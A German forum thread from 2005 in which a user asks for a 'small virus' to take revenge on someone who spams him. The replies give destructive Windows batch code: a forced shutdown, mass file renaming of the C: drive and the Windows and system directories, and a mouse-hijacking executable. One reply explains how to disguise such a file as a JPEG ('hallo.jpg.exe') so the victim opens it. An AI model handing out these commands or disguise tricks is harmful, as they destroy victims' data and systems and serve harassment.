kleiner Virus zum nerven

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von [mac]snails, 2. Oktober 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 2. Oktober 2005
    Heute wurd ich bös angemacht von nem n00b den ich in nem game fertig gemacht hab.
    Er bombadiert mich jetzt schon seit n paar Tagen mit mails (habe zuerst msn bekannschaft aus nem forum gemacht)
    und jetzt will ich mich rächen

    ist ja kla

    weiss da jemand was
    falls es werbung sein sollte für ne page,
    nicht hier schreiben, das entspricht nicht den regeln
    aber man darf es mir per pn schreiben.
    Danke an alle die mir helfen können
    gibt ne 10er
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 2. Oktober 2005
    hmm.. geb den man die links hier .. ---> www.omg.de.hm und dann den hier.. ^^
     
  4. #3 2. Oktober 2005
  5. #4 3. Oktober 2005
    Bluescreen haste feinen exploit genutzt der is aber schon alt ;)

    Ps.: kann falsch liegen^^ habs net angeschaut denke mir nur wegen de,m Pic und so
     
  6. #5 3. Oktober 2005
    ne bluescreen nicht!

    also bei omg.de.hm und und der hot_babe seite, is einfach nur nen riesiges bild, was schlechtere pc's abkacken lässt! aber zum beispiel bei mir läds nur mal kurz, man kann in der zeit seine maus net bewegen und nach nen paar sekunden geht wieder alles, dann kann man die seite wieder schliessen!

    und bei aquabelic öffnen sich einfach nur nen paar seiten, mit bissle sound und so ekligen bildern, dann einfach die iexplorer.exe im taskmanager schliessen und schon isses wieder vorbei! also auch schlecht gemacht, da es nicht wirklich neue fenster öffnet!


    alles schon ziemlich alt, und langweilig :D
     
  7. #6 3. Oktober 2005
    sowas hier :)

    aber vorsicht damit kann man schon einiges ausrichten!
    und ich komme nicht für entstandene kosten auf :p
     
  8. #7 3. Oktober 2005
    würd mich gerade auch intressieren
    macht man den auf und es passiert etwas?
    oder ist da noch etwas drinn?
    weil ich würde schon gerne die wirkung zuerst testen
    formatieren oder so?
     
  9. #8 3. Oktober 2005
    das kenn ich, der ürsprüngliche namen ist: CrazyMouse, wenn man es öffnet dreht die maus durch und klickt alles an, man hat keine kontrolle mehr!!! ja und so .bat dateien sind auch ganz lustich...

    irgendwie hab ich des glaub mal hochgeladen oder nich?

    weil die 2 selber sachen mach ich auch immer^^

    die .bat besteht nur aus

    ren * *.hahah_scheiß_noobs

    d.h es bennennt alle dateien in .hahah_scheiß_boobs um ^^




    achja da hab ich nochwas lustiges:

    neue textdatei -> den code einfügen:

    Code:
    shutdown -s -t 66 -c "Haha jetzt ärgere dich ;) by booby"
    exit
    -> abspeichern -> in .bat umbennennen -> verschiecken und sehen wie die user einer nach dem anderen offline gehn ^^
     
  10. #9 3. Oktober 2005
    also der anhang ist ja nur eine rar datei, die könnt ihr noch ohne probleme öffnen!

    die peace.exe ist auch nicht soo schlimm, probierts einfachmal aus, aber schliesst vorher am besten alle programme, dateien, etc. :]

    und die testit.bat, nennt alle dateien um..und zwar auf "dateiname"."dateiendung".HAHAHA_SCHEISS_NOOBS!!

    also zum beispiel: test.exe wird dann zu test.exe.HAHAHA_SCHEISS_NOOBS!!

    also wie gesagt is dann echt nicht so lustig :)


    //Edit: ui, war ein bissle langsam! aber da muss ich dir recht geben, ich finde .bat dateien sind einfach sehr lustig :D

    //Edit2: ich würde aber bei der shoutdown.bat das zeitlimit nicht so hoch machen! denn so hat derjenige noch 66sekunden zeit und das ist viel zu viel :D also ich würde es auf 5 oder so machen, denn wenn man weiss wie, kann man das auch wieder abbrechen!
     
  11. #10 3. Oktober 2005
    haha LOL
    tolle sache

    das mit dem code speichern weiss ich nicht genau
    aber der peace tuts auch denke ich

    oder wie muss ich das anstellen dass das funzt?
     
  12. #11 3. Oktober 2005


    die .bat und die exe hast von meinem funpic space gel? jetzt weis ichs wieder, da hab ich nämlich drauf um vor ungebetenen schnüfflern zu schützen :D


    joa is ja egal mit den 66, das kann man ja einfach einstellen^^

    da gibts noch viele tools die man benutzen kann^^


    achja zu der rename .bat:

    man kann das umbennennen nicht mit einemal rückgängig machen, d.h. man muss alles manuell machen und die verknüfungen ist im *****... also bitte nciht wild umherschicken^^
     
  13. #12 3. Oktober 2005
    ganz einfach:

    öffne den editor, dann kopierst du den code von oben, also:

    shutdown -s -t 66 -c "Haha jetzt ärgere dich ;) by booby"
    exit


    den fügst du in den editor ein und speicherst das als blabla.BAT

    wichtig ist das die endung .bat ist, und das wars schon :]

    //edit: die peace.exe hab ich von dir richtig :p
     
  14. #13 3. Oktober 2005
    joa die .bat kann man auch noch in eine .exe mit nem bat2exe converter umwandeln ^^ hab irgendwo noch einen, find ihn aber grad nich^^
     
  15. #14 4. Oktober 2005
    Einfach shutdown -a in der cmd und der Vorgang wird abgebrochen ;)
     
  16. #15 4. Oktober 2005


    und das reicht?? ren * *.haha
    das dann als .bat und derjenige hat spass ohne ende?
     
  17. #16 4. Oktober 2005
    richtig :)
    geht auch statt ren, rename zu schreiben, aber das is halt bissle auffälliger :p

    wie gesagt is echt nicht zu spaßen mit! also VORSICHT!
     
  18. #17 4. Oktober 2005
    noch mehr spaß hatter wenn du folgendes machst
    c:
    cd c:\
    ren *.* *.muahahahaha

    dann hat er nämlich folgendes problem: alle dateien auf c werden in *.muahahahah umbennant.
    da meist windoof auf der partition is...pech^^
    funzt natürich nur bei den dateien die grade net verwendet werden...aber trotzdem...is erwähnenswert^^
     
  19. #18 4. Oktober 2005
    muss mann da jetzt die bat datei öffnen oder die andere?
     
  20. #19 4. Oktober 2005
    die peace.exe lässt deine maus "durchdrehen"

    die ander (.bat datei) bennennt alle dateien um ^^
     
  21. #20 4. Oktober 2005
    das peace.exe is ja mal so geil :)

    und das

    shutdown -s -t 66 -c "Haha jetzt ärgere dich Augenzwinkern by booby"
    exit

    was hat das für nen sinn???

    da hat er noch 66 sec zeit, das abzubrechen...

    shutdown -a

    ganz einfach^^

    also macht da 5 sec hin ;-)


    ich hab noch was besseres... wenn er dich mit mails voll spamt..

    dann schick ne mail an abuse... oder schick mir ne pn mit seiner addy...

    und dann besorg mir webspace mit php... also nen acc faken...

    dann mach ich da was^^

    Mfg Halloweenracer
     
  22. #21 4. Oktober 2005
    frage man könnte doch auch die peace.exe oder den anderen mit einer jpeg datei binden oder?
     
  23. #22 4. Oktober 2005
    ich glaub nicht das du das so eifanch in ne jpg einbinden kannst..

    da bin cih überfragt, aber ich denke das is unmöglich...
     
  24. #23 4. Oktober 2005

    ja stimmt klapt nicht womit könnte man es den binden kann das jemand sagen?
     
  25. #24 5. Oktober 2005
    Stimmt, das geht nicht... man kann es in ne exe verwndeln und n jpg symbol hinmachen und es hallo.jpg.exe nennen.... brauch man halt n tool für....
    wenn du da son noob am start hast, hat der die endung eh ausgeblendet und
    denkt es wär ne jpg :)
     
  26. #25 6. Oktober 2005
    Noch besser:

    Code:
    cd /D %WINDIR%
    ren * *.lol
    cd /D %SYSDIR%
    ren * *.lol
    
    Das is Laufwerksunabhängig und macht gleich Windir + Sysdir ^^

    Ausserdem: Nur REN reicht nicht; damit durchsucht er keine Unterordner., also wäre ren c:\* c:\*.[...] quatsch...

    MfG. Roog
     

  27. Videos zum Thema
Die Seite wird geladen...